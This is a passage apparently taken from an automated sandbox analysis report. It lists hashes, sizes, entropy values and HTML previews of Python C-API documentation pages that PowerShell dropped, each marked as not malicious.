                                                                                                    SSDEEP:768:Oqy+P4MAweCJ1cLeCJ18DeiCHjsWJueCJ5eCHjeCHJl63JmeCJ5eCHjeCHJV65JM:OqyfMAweCJ1cLeCJ18DeiCHjsWJueCJ7
                                                                                                    MD5:5A84BB66E9CD299F3331A17301B25AD9
                                                                                                    SHA1:1B6A4829DD7B8DBCDBC55A45EB3F2BDA056B0116
                                                                                                    SHA-256:9B68DBF25DFAD19BAD6755CC38E8C1189E2E97EF6E1612C6FBC47CDC35AD061B
                                                                                                    SHA-512:E58E65654FA3CB6D6A2C7C1D33474CD921F71D1F44466288662A4DF1333197E67554FD9AB66F9A9E104725B5DD2F68B8CE33725B7A4BD4E20C7D19CC0882F3A0
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Codec registry and support functions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/codec.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Codec lookup API: In the following functions, the encoding string is looked up converted to all lower-case characters, which makes encodings looked up through this mechanism effectively case-insens..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Codec lookup API: In the following functions, th
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (833), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34547
                                                                                                    Entropy (8bit):4.892106689102129
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:4qy5T+M8xe3xd4zeDwPXodeDwPXKKeDd4veDwPXWveDCPzRueDdPuHHeoleCDeCq:4qy4M8xe3x+zeDwPXodeDwPXKKeDd4vG
                                                                                                    MD5:637098068684E175F04062C3C86C5785
                                                                                                    SHA1:C5D68268AD9EFC448BC82858F376B48C3D4F707B
                                                                                                    SHA-256:42E6884E3139551843087EDDB5814AB5738BA81430725141C59055B6FACFA0F3
                                                                                                    SHA-512:DFFFC0449367E8ADFC20DF4A8BA25597B373F690AC41C325B10D7054B52A076A427D39D22DC1C83B5591C2870D6D0DE954C7DC7094507AD541FAF73040922C10
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Complex Number Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/complex.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python.s complex number objects are implemented as two distinct types when viewed from the C API: one is the Python object exposed to Python programs, and the other is a C structure which represent..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python.s complex number objects are implemented as two d
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25525
                                                                                                    Entropy (8bit):4.891256045159486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WEvartgKHqkX1vSmMzMg4nQTMb9BsR5Q+qs9xV5wEsJ5UCOA06zlQypVmdVYhkCV:AHqklkn4nQTMJoxyhXy4nmTMx76dqEC
                                                                                                    MD5:E873E4762DFC00724E59871CAFF91A6F
                                                                                                    SHA1:91EB19FA9402C48D88163C616ED06A7FA275C2F2
                                                                                                    SHA-256:A680617C9E00485FB0B6FD8B597B6AFAD9EC51DCCE54485587689E9FE14BED04
                                                                                                    SHA-512:47EC7C8893917C65428C7B14D2F943B555A6FAF5138B3D86EFA13562DEC04A4466A1B8D35860596A3EB19A9E507B0EA772F360FA3E2DFF5F40AD555821B88EBD
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Concrete Objects Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/concrete.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter are specific to certain Python object types. Passing them an object of the wrong type is not a good idea; if you receive an object from a Python program and you are no..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter are specific to certain Pytho
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1200), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33749
                                                                                                    Entropy (8bit):4.8817079061883515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:xqyOSrM52TezSepaeTgexDe2neEReCJlyeBUeCJlRpueCJlBJRerCJeeCJN+7JFN:xqyXM52TezSepaeTgexDe2neEReCJl93
                                                                                                    MD5:CE70A621DB9EC2C554069CE7CF8BA0E1
                                                                                                    SHA1:9197CEAE4094E4ED9C62C3DEECEEF103D0B4404F
                                                                                                    SHA-256:FE1940FBC07D947B633C8830D7646D7268A7D35097B64F2FED7B0A89F397B9A5
                                                                                                    SHA-512:7FC6B2D63208C101A8900FA0980C4111E77CD24970E31EABD7C7DC48AD7357A1882DEAA44381FAC879EE071A2749F4A75D028ED7E8A4CB7BF3CB960749E72015
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Context Variables Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/contextvars.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section details the public C API for the contextvars module. Type-check macros: Context object management functions: Context variable functions:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section details the public C API for the contextvars module. Type-check macros: Context object mana
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1118), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38240
                                                                                                    Entropy (8bit):4.812067415404105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:pNqqyPydMl9e9HrQqeCHtkLLe9HrQqeCHt+maEEeiCHrZHMjeoOxuN/deiCHrZHt:pNqqysMl9e9HrQqeCHtkLLe9HrQqeCHl
                                                                                                    MD5:9DC1E315EB676DB4D4C6B8EC1962B93F
                                                                                                    SHA1:59675D0484815E7768C6145C5B1BB41DA0B8DFD3
                                                                                                    SHA-256:DE645D1D65FEE20E75803A3547AC2759E291E9A64DBA91B4EDB18A7455499E9E
                                                                                                    SHA-512:BC30AE807A3EF048F2FE89F40C79C75CF41B3190CCCB48DCBE4E021DC0DF66676BF57E5065A212B9AB0F6A95E9112AA468AB3E2BB00C029B71D7D6F0D8C5D61E
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="String conversion and formatting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/conversion.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Functions for number conversion and formatted string output. PyOS_snprintf() and PyOS_vsnprintf() wrap the Standard C library functions snprintf() and vsnprintf(). Their purpose is to guarantee con..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Functions for number conversion and formatted s
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1283), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16927
                                                                                                    Entropy (8bit):4.870825245605953
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:8HqklxBZn1TM4dwe0D0edleIVJjtVJHe+JpEVJJEVJK9cHn5TMi76dqEC:gqyx3xM8wem0edleCJjfJHe+JpeJJeJ1
                                                                                                    MD5:354C9315BADA57E5E01BE150C9AD620E
                                                                                                    SHA1:3F6218C4D1C34810AA4E7E371DEC6A66F72DA227
                                                                                                    SHA-256:D19880403F68DA999DDC9AEDE58CCC9044C5D20434A824CE457D892B8EB974A0
                                                                                                    SHA-512:6DAFCD25CA3D37B23BCF1F94999B14A8CF096D18098B1AEEBDB662A666DC16406F5A2739E3E45726CBF638729FA40F0DDD44C1587A9A428808E99A05F290B788
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Coroutine Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/coro.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Coroutine objects are what functions declared with an async keyword return." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Coroutine objects are what functions declared with an async keyword return." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name=
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1557), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67978
                                                                                                    Entropy (8bit):4.885894045404287
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:LqyPMhKe4HeCbe3WeMgeQdeVZemIemueKJDeSJeCJjE2eCJjuYeCJjkVeCJjI8eK:DTg
                                                                                                    MD5:B48FFF08046E2D30891A4210D31DFC5C
                                                                                                    SHA1:5F7CD87A522AD7AC7EEEA65391DA4E7D74FAB510
                                                                                                    SHA-256:1AD6F567798E87E6E2E6C2CE48E69014BC940DBBB508B521CEE3F39AE7B80F3A
                                                                                                    SHA-512:6646EDDAB16CCC84BC4B8E73268BA9B1A92D87A3D86625F05155041A439E1D655437CA0587C449E6F242DEC2F26FE7FCECA60DEFA3324A110926AB29D1CD5B11
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="DateTime Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/datetime.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Various date and time objects are supplied by the datetime module. Before using any of these functions, the header file datetime.h must be included in your source (note that this is not included by..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Various date and time objects are supplied by the datetime module
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1204), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22641
                                                                                                    Entropy (8bit):4.875868822676572
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:uHqkl1BAnWTM2DUeEqVJHeIJe0pJ+OVJ9eIJe0bSSNJcNVJCeIJe0WJcGVJYeIJk:Cqy1i8MwUeLJHeIJe0pJ+EJ9eIJe0bST
                                                                                                    MD5:B43CBB6A201C8AF0EC526DF0FE0AD8BC
                                                                                                    SHA1:1CADDCAF1DACD838C166BD451235FA20A524EA8A
                                                                                                    SHA-256:2024222B523271BD0DA07918791579B3788B37449C660EB1FAAE86E8BDE29F0B
                                                                                                    SHA-512:F5199EDBAC7CD41845B7309626937046026AC438C2C3F431595CAAE44F8885044478E184704A84B814F237E8927350F1B6317BA27037652B435910D38D07A2A9
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Descriptor Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/descriptor.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content=".Descriptors. are objects that describe some attribute of an object. They are found in the dictionary of type objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content=".Descriptors. are objects that describe some attribute of an object. They are found in the dictionary of type objects." />..<meta prope
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1859), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72321
                                                                                                    Entropy (8bit):4.8170634575554105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:qqywMQhez/eT1eCJsy6eCJs9JOeDJqeCJKTUeCJsLYeCJseJr2JzeCJsHOeCJseu:BNCWxg
                                                                                                    MD5:ABFCD510A5957E738A8EC774ADA2E33E
                                                                                                    SHA1:735549406A3622F195D657678DD1ED3742FF480F
                                                                                                    SHA-256:8EF8773302AE46648026FDEAB109A5E40FDF6AC05DE7B52C1C553A72134D2116
                                                                                                    SHA-512:EA214EE14A290972D50D92F514AC2ED06C01BE1CC048A009AFFCDCB6519EE587BBD5C6A4FBD79F25075B6865AF850E08C637A2C584F536FCF269F86075528937
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Dictionary Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/dict.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Dictionary Objects &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1576), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):213783
                                                                                                    Entropy (8bit):4.819670679843809
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:OrVqy0MenKdeOaeUFbDe9teCJp69eCJq5ox3eCJeeCH7hwOFfeCJeeJBAWeoJQe+:VWcWwOkWeXtUUNezdtNAWu0GzZm3GYg
                                                                                                    MD5:CE526A73BD478722DB418566C499F94E
                                                                                                    SHA1:519D53C3E263019E16B8D32A403AD7E5E84586B8
                                                                                                    SHA-256:1612FDF2700731DBC10AEE7B876221171594754161CAB66C3A193ADDB322E2FE
                                                                                                    SHA-512:2E0C4A74514B5EEA799E4F84DDF5CB34FC62285BFD8E3015428F2A80301801FD1238470724B540C77B042A0AC20E60BC2BDD97ECF9FAB8548F6A6B41B65BFF78
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Exception Handling" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/exceptions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions described in this chapter will let you handle and raise Python exceptions. It is important to understand some of the basics of Python exception handling. It works somewhat like the PO..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions described in this chapter will let you handle a
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2160), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29104
                                                                                                    Entropy (8bit):4.871777385163392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:6qylDQM/zJeeUNeCHJeCHNo5eCHjeCHJeCHco5/tTeCJs+aYJseCJsoZQ9leph7/:6qyqM/zJeeUNeCHJeCHNo5eCHjeCHJeP
                                                                                                    MD5:00F8228B186364B5601B9C042AF0ECB5
                                                                                                    SHA1:0A635C565238261E420F077D73D2C80B2922DD76
                                                                                                    SHA-256:9A5A1EF829620B298B47FF3DE75058580B6F1FCF577857554C701B772C77DBDC
                                                                                                    SHA-512:D3A2C832660B038AFA54FCBA15814D02531A7577492CF7FC4C60DD5036DB7CB03EBCB8396346BA6A8DE2C2F6CFA6D49DF4F1C694382CD9D27810E37AA92D3D41
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="File Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/file.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These APIs are a minimal emulation of the Python 2 C API for built-in file objects, which used to rely on the buffered I/O ( FILE*) support from the C standard library. In Python 3, files and strea..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These APIs are a minimal emulation of the Python 2 C API for built-in fil
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (848), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):37993
                                                                                                    Entropy (8bit):4.887751833127853
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:7qyMEkMUNexTe6peCJs1WeCJsTJheCJrTJxeQxHAeCJ7f0heCJ75jJuerM7eJPBn:7qySMUNexTe6peCJs1WeCJsTJheCJrTB
                                                                                                    MD5:D371F31190459D34CB37234C1777C4E9
                                                                                                    SHA1:00B5E1995846C3B71FF9402E8EB9634FDB289D43
                                                                                                    SHA-256:89AF352BF421F0FCCB607747DE4885895091B6F251C75CC33794BFF22A206232
                                                                                                    SHA-512:BCC7AD085F50BD357D5BA8911F8D2C11C92303260B1C2CC81B29C8D0FCB8A67EEAB86718E11FD2A119B48BFEB5F954DCC0A9726B6C376D1A842BF366A6DEEE80
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Floating Point Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/float.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Pack and Unpack functions: The pack and unpack functions provide an efficient platform-independent way to store floating-point values as byte strings. The Pack routines produce a bytes string from ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Pack and Unpack functions: The pack and unpack functions provi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1010), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36833
                                                                                                    Entropy (8bit):4.888510774866766
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:qqyZhhMRaeCSevieCJpZ8JueOJpoeJleOJpbWJoeOJp5CJweOJpgMJteOJpLgje6:qqyZMRaeCSevieCJpGJueOJpoeJleOJQ
                                                                                                    MD5:6AA9B1097EEDCEC6D3D62A056627DA70
                                                                                                    SHA1:3113ED64A2B9815CC44EF41CA4250FA9CDF42DBB
                                                                                                    SHA-256:0BDB9292C76B2830C287FE79E23845C6B157A3DC48C66378AD502676663174F0
                                                                                                    SHA-512:7D8F75345B4DBA6664856098537BEB5C6DB00A400D23E72EB1E0C62EEEFEDCEAE598295A0B0774411F83EC9DA9635C19497AC9904C146844CF092FBDE8958EA8
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Frame Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/frame.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The PyEval_GetFrame() and PyThreadState_GetFrame() functions can be used to get a frame object. See also Reflection. Internal Frames: Unless using PEP 523, you will not need this." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The PyEval_GetFrame() and PyThreadState_GetFrame() functions can be used to get a frame obje
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1550), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):41352
                                                                                                    Entropy (8bit):4.886201978528639
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ZqymEMMYxexfeFFeCJl3JOeCJreJ0hJaeCJreJ0eJKeLJleCJ9HJ6eCJ9CJweCJo:Zqy+MYxexfeFFeCJl3JOeCJreJ0hJaen
                                                                                                    MD5:E1D9D4EB16CAAD47A8E14CFA57CE26CB
                                                                                                    SHA1:49EBD5F98E6ADF1E49C819818FD676C41E872E1E
                                                                                                    SHA-256:E388561BBC1EA809B5988A6E596F7E40C7AA500AF3699DD30FE51E931BBEE0E8
                                                                                                    SHA-512:73AC31557E0B5BA7D81A47B2D8FF436E1C8A1069F8EF517C9F45F0A7420488DB4BB22A92034EEEA53DCDECFEE45883A24185ABFA48BEBD50020053C622E73561
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Function Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/function.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a few functions specific to Python functions." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a few functions specific to Python functions." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1387), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54027
                                                                                                    Entropy (8bit):4.921374655045684
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:eqyu32aMfgXeGtVeGtn6J1eIJeQpRTeGhnugieCJ9gReCJpcHneCJ9PuLeCJ9D5N:132f2P6RdszKNmpKMd23yg
                                                                                                    MD5:F2B982F211EA79B09C1F4FB35B250060
                                                                                                    SHA1:97E0714BD0DC03C72FC834B99990A940C20BCA4C
                                                                                                    SHA-256:8945B6192A23B8007108D9E4592B028369548818BF05E4BB5B3856A9D1A9B532
                                                                                                    SHA-512:466D5AC8A781456F7BB2ABC32EA08DC89D8DA7FD72060183AB960C1EF32F3B85841329B61B53B7F0DC98A2715ADFF8AFC7635D2FC38294792AEA4E651E011EBE
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Supporting Cyclic Garbage Collection" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/gcsupport.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python.s support for detecting and collecting garbage which involves circular references requires support from object types which are .containers. for other objects which may also be containers. Ty..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python.s support for detecting and c
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1305), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19443
                                                                                                    Entropy (8bit):4.887269112763904
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:VQOHqklYR0hnsTMoVefDLeDheIVJjuOeIVJj6VJse+JpOVJge+JpEVJJEVJKwRZf:HqyYwCMoVerLeDheCJjuOeCJjQJse+J5
                                                                                                    MD5:7B4208B7497C5414C02DA91293AD4DC2
                                                                                                    SHA1:5D3B643E555E8C35835B47B0A04BFE55DB13C583
                                                                                                    SHA-256:663AD78D1DAAE753E7C93E348DD86435BA901B285ECB2D81AF163BAF0CF955FF
                                                                                                    SHA-512:FAAA04017C4701E5A6A3F86349EA6B8CA75DD215172D68770A6D13926CEE35825100A48B87B575E82E222BF42698574CEE01D02C43D2B7B8C090A5B8E7E4B871
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Generator Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/gen.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Generator objects are what Python uses to implement generator iterators. They are normally created by iterating over a function that yields values, rather than explicitly calling PyGen_New() or PyG..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Generator objects are what Python uses to implement generator iterato
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (536), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17190
                                                                                                    Entropy (8bit):4.883324490997966
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:nHqklyEUnnTMLqegPpeoGEePCHHe/pUePpveVDJXerUZup8nDTMS76dqEC:HqyyNTMLqeupevEePCHHe/pUePpveJJr
                                                                                                    MD5:4AE42ADEF8F2AF6FB296110969F586F9
                                                                                                    SHA1:7459E1DC05EC49687EB35047CA84EA719E30BC36
                                                                                                    SHA-256:2BDFAAB91AF2D0A51C46936D107DD30885176D6971E069BFC5A3CEFBC6982CFD
                                                                                                    SHA-512:72825F93A41B253C97CC7F651890E083DDAB55C2A7B062888BBF99A9AA88131A3400B2815A9F5D4909FFDA4B81BA4DF9A3DFA30F6E5078B012834677D77C4752
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="PyHash API" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/hash.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also the PyTypeObject.tp_hash member." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also the PyTypeObject.tp_hash member." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>PyHash API &#8212; Python
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1720), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67467
                                                                                                    Entropy (8bit):4.85299626927617
                                                                                                    Encrypted:false
